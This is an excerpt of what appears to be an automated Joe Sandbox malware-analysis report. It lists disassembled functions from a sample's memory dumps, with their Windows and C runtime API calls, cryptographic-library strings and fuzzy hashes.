Opcode Fuzzy Hash: cf04fe6418aeb316eabd235343543611ab0cc8a9cd3a21afb999d8c1a1f04e3e
Instruction Fuzzy Hash: 3231EDB0E006189FDB10CFA9CD80B6DB7F9AF85200F64859AE559EB252D771ED418F50

Uniqueness

Uniqueness Score: -1.00%

Function 6D089011 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: a43a446dfbc9886f7f36ee9c51db173e10b5d32ef472cdb2a38e259e37236f43
Instruction ID: a04caf0ee41fdf12821f914e0be9d2b5bf63508442200d11cb17285c93aabcab
Opcode Fuzzy Hash: a43a446dfbc9886f7f36ee9c51db173e10b5d32ef472cdb2a38e259e37236f43
Instruction Fuzzy Hash: D5310B70E006189FDF10DBA8CC80F6EB7F9AF89200F64899AE519E7286D775E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D0D249C Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000100,?,?,?,?,?,6D0D25B1,?,00000000,?), ref: 6D0D24E6
_malloc.LIBCMT ref: 6D0D251B
_memset.LIBCMT ref: 6D0D253B
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000,00000001,00000000), ref: 6D0D2550
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6D0D255E
__freea.LIBCMT ref: 6D0D2568

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ByteCharMultiWide$StringType__freea_malloc_memset
String ID:
API String ID: 525495869-0
Opcode ID: 89f4c6d735adf1a621f837ba8f818fd4247a4d37e83c5993c2114edda6761820
Instruction ID: bd886fa1a59aa3e7509ed2d293923482b25b150ff992dd3acdbe8d9eb82420cb
Opcode Fuzzy Hash: 89f4c6d735adf1a621f837ba8f818fd4247a4d37e83c5993c2114edda6761820
Instruction Fuzzy Hash: A63159B160020AAFFB11CF68DC90FAF7BE9EB49358F114426FA15D7254E734D9608A60

Uniqueness

Uniqueness Score: -1.00%

Function 6D088A39 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6D0869C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D086A08
Part of subcall function 6D0869C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D086A15
Part of subcall function 6D0869C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D086A41

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 94759b6bad6a80ca9e1c87bac80588819d13b6d65ddecd0245e30e0743ad8bce
Instruction ID: 0316b5ecd22ee36db24a654a90dd1fac1c9ca80e374d9f1db327a73892729978
Opcode Fuzzy Hash: 94759b6bad6a80ca9e1c87bac80588819d13b6d65ddecd0245e30e0743ad8bce
Instruction Fuzzy Hash: 44312B70E006189FDF10CB68CC80FAEB7B9AF95300F604A8AE519E7682C775E980CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D0887EE Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6D0869C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D086A08
Part of subcall function 6D0869C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D086A15
Part of subcall function 6D0869C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D086A41

SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08AEBF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: d9154cb9f1e76226f12660d5f0ae345477bb259d9876e38bbc8226a5777b145a
Instruction ID: ea25dd3fad8072a6bfb4b1925a1e4fc0ef12f7853229debcc39f248a62d4a8ea
Opcode Fuzzy Hash: d9154cb9f1e76226f12660d5f0ae345477bb259d9876e38bbc8226a5777b145a
Instruction Fuzzy Hash: 7C312B70E006189FDF10CB68CC80FAEB7BAAF95600F60498AE519E7282D775E980CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D07FD3E Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6D0869C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D086A08
Part of subcall function 6D0869C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D086A15
Part of subcall function 6D0869C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D086A41

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: d9154cb9f1e76226f12660d5f0ae345477bb259d9876e38bbc8226a5777b145a
Instruction ID: 2eed9d49255d474b2927bbc913e2059eb2b901918f78b254d2faf5a314a03e2a
Opcode Fuzzy Hash: d9154cb9f1e76226f12660d5f0ae345477bb259d9876e38bbc8226a5777b145a
Instruction Fuzzy Hash: 76310C70E006189FDF10DFA9CD80BADB7BAAF95310F60458AE559EB242D775DD808F50

Uniqueness

Uniqueness Score: -1.00%

Function 6D07FF89 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6D0869C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6D086A08
Part of subcall function 6D0869C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D086A15
Part of subcall function 6D0869C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D086A41

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 94759b6bad6a80ca9e1c87bac80588819d13b6d65ddecd0245e30e0743ad8bce
Instruction ID: b269b1695dd7e4569d16bcb38e587e067ef7652002885c4af362affca232eff4
Opcode Fuzzy Hash: 94759b6bad6a80ca9e1c87bac80588819d13b6d65ddecd0245e30e0743ad8bce
Instruction Fuzzy Hash: E0310C70E006189FDB20CBA9CC90BADB7FAAF85310F60469AE559EB242C775DD808F50

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C06A0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 6D064760: __CxxThrowException@8.LIBCMT ref: 6D0647F9

_memmove.LIBCMT ref: 6D0C0907
_memmove.LIBCMT ref: 6D0C0936
_memmove.LIBCMT ref: 6D0C0959
__CxxThrowException@8.LIBCMT ref: 6D0C0A25

Strings

PSSR_MEM: message recovery disabled, xrefs: 6D0C09E3

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _memmove$Exception@8Throw
String ID: PSSR_MEM: message recovery disabled
API String ID: 2655171816-3051149714
Opcode ID: b385d3e71cc67babd30f15613a87f577dda75895cd039486d0b315d7cc898a47
Instruction ID: 24941f0494b9702f4812da5d591fa68a652ee1f213fdf083dfa002ddc604f266
Opcode Fuzzy Hash: b385d3e71cc67babd30f15613a87f577dda75895cd039486d0b315d7cc898a47
Instruction Fuzzy Hash: B8C137B56083419FE715CF29C880B6EBBE5AFC9304F148A5CE58987385DB74E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C7FE0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 325COMMON

Download Yara Rule

APIs

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

__CxxThrowException@8.LIBCMT ref: 6D0C80EA

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

Strings

Min, xrefs: 6D0C83C5
invalid bit length, xrefs: 6D0C8044
RandomNumberType, xrefs: 6D0C83A9
Max, xrefs: 6D0C83E3

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: Max$Min$RandomNumberType$invalid bit length
API String ID: 3718517217-2498579642
Opcode ID: 6a0be514c39c2cff9795049e4e0b9ac6d2056a1dd30167905938571c0f55e3ef
Instruction ID: a4b7b037702cf8dfe02d2f2de83a1599175fe3ae0b5f997c236791ef3a11588b
Opcode Fuzzy Hash: 6a0be514c39c2cff9795049e4e0b9ac6d2056a1dd30167905938571c0f55e3ef
Instruction Fuzzy Hash: 60C18C7050D7809AF324CB68D850B9FB7E5BFDA304F454A2CE68987391EB749908C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 6D0CBE8E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6D0CBEB6

Part of subcall function 6D0CAB70: __getptd.LIBCMT ref: 6D0CAB7E
Part of subcall function 6D0CAB70: __getptd.LIBCMT ref: 6D0CAB8C

__getptd.LIBCMT ref: 6D0CBEC0

Part of subcall function 6D0CEAE6: __getptd_noexit.LIBCMT ref: 6D0CEAE9
Part of subcall function 6D0CEAE6: __amsg_exit.LIBCMT ref: 6D0CEAF6

__getptd.LIBCMT ref: 6D0CBECE
__getptd.LIBCMT ref: 6D0CBEDC
__getptd.LIBCMT ref: 6D0CBEE7
_CallCatchBlock2.LIBCMT ref: 6D0CBF0D

Part of subcall function 6D0CAC15: __CallSettingFrame@12.LIBCMT ref: 6D0CAC61

Part of subcall function 6D0CBFB4: __getptd.LIBCMT ref: 6D0CBFC3
Part of subcall function 6D0CBFB4: __getptd.LIBCMT ref: 6D0CBFD1

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 7c8afcac9932e8103ecd7d7c188d52601dc5894a3c384a239d2a1dfde6646185
Instruction ID: cc43b261904892387c6be378ebfd3e5ca4161d47fc63217b93be5116d523b66b
Opcode Fuzzy Hash: 7c8afcac9932e8103ecd7d7c188d52601dc5894a3c384a239d2a1dfde6646185
Instruction Fuzzy Hash: 1C11F3B1C082099FEB00DFA4C545BEEBBB0FF48318F118469E914A7260EB789A119F61

Uniqueness

Uniqueness Score: -1.00%

Function 060F0F14 Relevance: 9.0, Strings: 7, Instructions: 201COMMON

Download Yara Rule

Strings

Gvq, xrefs: 060F1243
p<^q, xrefs: 060F112C
p<^q, xrefs: 060F1177
HERE, xrefs: 060F0F6F
LOOK, xrefs: 060F0F6A
LOOK, xrefs: 060F1081
HERE, xrefs: 060F1086

Memory Dump Source

Source File: 00000000.00000002.1729649396.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60f0000_file.jbxd

Similarity

API ID:
String ID: HERE$HERE$LOOK$LOOK$p<^q$p<^q$Gvq
API String ID: 0-792669839
Opcode ID: 45b9f79ead8586f916e16817328702e0f8b4bd89e9f9f5d4ab91f97be35ca56a
Instruction ID: 85f6d1c38d3d0144b1e2337e15f15547911455793144b7cb6f09221ee7fa0f00
Opcode Fuzzy Hash: 45b9f79ead8586f916e16817328702e0f8b4bd89e9f9f5d4ab91f97be35ca56a
Instruction Fuzzy Hash: 1AA18174E40229CFDBA8DF68C994BD9BBF1AB48310F1481E9D50DAB261DB709E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D0970E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 187COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6D097267

Strings

exceeds the maximum of , xrefs: 6D097309
is less than the minimum of , xrefs: 6D0971D0
: IV length , xrefs: 6D09719E, 6D0972D7

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8Throw
String ID: exceeds the maximum of $ is less than the minimum of $: IV length
API String ID: 2005118841-1273958906
Opcode ID: 1ccec596868e942bb87c51702fe273ad66b31c5b2209f8dc392351d1dd973bb8
Instruction ID: 84f47833dfb533cef96032e81c960f080ed15eb8d08f63efb116cbd6997e42b9
Opcode Fuzzy Hash: 1ccec596868e942bb87c51702fe273ad66b31c5b2209f8dc392351d1dd973bb8
Instruction Fuzzy Hash: 5261607110C380AFE321DB68C884FDFB7E8AF99348F114A1DE69D87281DB75990487A7

Uniqueness

Uniqueness Score: -1.00%

Function 6D0BAE90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6D0BAF27
_strncmp.LIBCMT ref: 6D0BAFA6

Strings

ValueNames, xrefs: 6D0BAEB7
ThisPointer:, xrefs: 6D0BAF4B, 6D0BAFA0

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: 45b74b3df40d3d76952e51bbe0b45cd25a3e319595e61a05995cb4952c66340c
Instruction ID: 82d3c3be7d0c895e5218ee8819b93e6541cc84ba2145853b87aa108ad5ae318d
Opcode Fuzzy Hash: 45b74b3df40d3d76952e51bbe0b45cd25a3e319595e61a05995cb4952c66340c
Instruction Fuzzy Hash: 5251C37120C3425BE314CFA58890F7BBBEAAF85348F144A5DE5E687291D773E809C752

Uniqueness

Uniqueness Score: -1.00%

Function 6D09A360 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6D09A3F7
_strncmp.LIBCMT ref: 6D09A476

Strings

ValueNames, xrefs: 6D09A387
ThisPointer:, xrefs: 6D09A41B, 6D09A470

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: fc782e9d526d6abfb2863e2a82fd1226e17683656d91897d87b38607d62295e3
Instruction ID: 0f5e34c0c90ef4593bbc2ad9e9c4781585738c2073b35921d792535ecdc4c8f4
Opcode Fuzzy Hash: fc782e9d526d6abfb2863e2a82fd1226e17683656d91897d87b38607d62295e3
Instruction Fuzzy Hash: 2151D6716083415BE314CF64D894F37B7EAAFC6358F254A5CF5DA8B281D722E8098752

Uniqueness

Uniqueness Score: -1.00%

Function 6D0BB9B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6D0BBA47
_strncmp.LIBCMT ref: 6D0BBAC6

Strings

